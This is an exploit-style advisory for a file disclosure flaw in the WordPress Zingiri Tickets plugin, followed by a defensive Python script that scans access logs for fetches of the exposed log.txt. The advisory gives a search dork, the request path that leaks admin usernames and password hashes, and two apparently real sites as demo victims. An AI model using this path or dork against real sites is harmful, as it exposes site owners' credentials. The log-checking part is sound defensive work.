The WordPress Zingiri Tickets plugin suffers from a file disclosure vulnerability that exposes a log file holding administrative username and password hashes.
##########################################################################
# Title : WordPress Plugin Zingiri Tickets #
# Author: MadLeeTs #
# Greets: Shadow008,1337,Invectus,pSyCh0_3D,KhanTastiC,MadBuGz,H4x0rL1f3 #
# Vendor: http://www.zingiri.com/plugins-and-addons/tickets/ #
# Email : h4x0rl1f3@gmail.com WwW.MadLeeTs.CoM <http://www.madleets.com/> #
# Date : 17/04/2012 #
# Dork : "/wp-content/plugins/zingiri-tickets" #
# Category : PHP [Local File Disclosure] #
# Tested on: [Windows 7, Linux Ubuntu] #
##########################################################################
Exploit
This vulnerability has a very high impact because it discloses the admin
username and password hashes.
[localhost]/[path]/wp-content/plugins/zingiri-tickets/log.txt
Demo 1
http://www.hms69.com/wp-content/plugins/zingiri-tickets/log.txt
Demo 2
http://www.ranahost.com/wp-content/plugins/zingiri-tickets/log.txt
Regards to www.cyberarmy.com.pk & www.c0d3rz.com
##########################################################################
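For site owners reviewing whether the log file named above was retrieved from their own server, the following is an added example, not part of the original advisory. It assumes Apache/nginx "combined" access logs; the sample lines and addresses are constructed.

```python
import re
import posixpath
from collections import defaultdict
from urllib.parse import unquote

# Path from the advisory, relative to the WordPress root.
EXPOSED = "/wp-content/plugins/zingiri-tickets/log.txt"

# "combined" log format is an assumption; adjust for custom LogFormat strings.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

SAMPLE = [  # constructed log lines using documentation-range addresses
    '192.0.2.10 - - [17/Apr/2012:10:01:02 +0000] "GET /wp-content/plugins/zingiri-tickets/log.txt HTTP/1.1" 200 5120 "-" "curl/7.21"',
    '198.51.100.7 - - [17/Apr/2012:10:05:40 +0000] "GET /blog/wp-content/plugins/Zingiri-Tickets/%6cog.txt?x=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [17/Apr/2012:10:09:11 +0000] "GET /wp-content/plugins/zingiri-tickets/log.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.99 - - [17/Apr/2012:10:12:00 +0000] "GET /wp-content/plugins/zingiri-tickets/readme.txt HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
]

def normalize(target):
    """Drop the query string, percent-decode, collapse ./ and //, lowercase."""
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    return posixpath.normpath(path).lower()

def find_log_fetches(lines):
    """Return {client_ip: [(timestamp, status, bytes), ...]} for requests to the log file."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m is None or not normalize(m["target"]).endswith(EXPOSED):
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["ip"]].append((m["ts"], int(m["status"]), size))
    return dict(hits)

def disclosed(hits):
    """Clients that actually received file content (2xx response with a body)."""
    return sorted(ip for ip, rows in hits.items()
                  if any(200 <= status < 300 and size > 0 for _, status, size in rows))

if __name__ == "__main__":
    print(disclosed(find_log_fetches(SAMPLE)))
```

Any address returned by `disclosed` received the file's contents, so the admin credentials whose hashes it held should be treated as exposed and rotated.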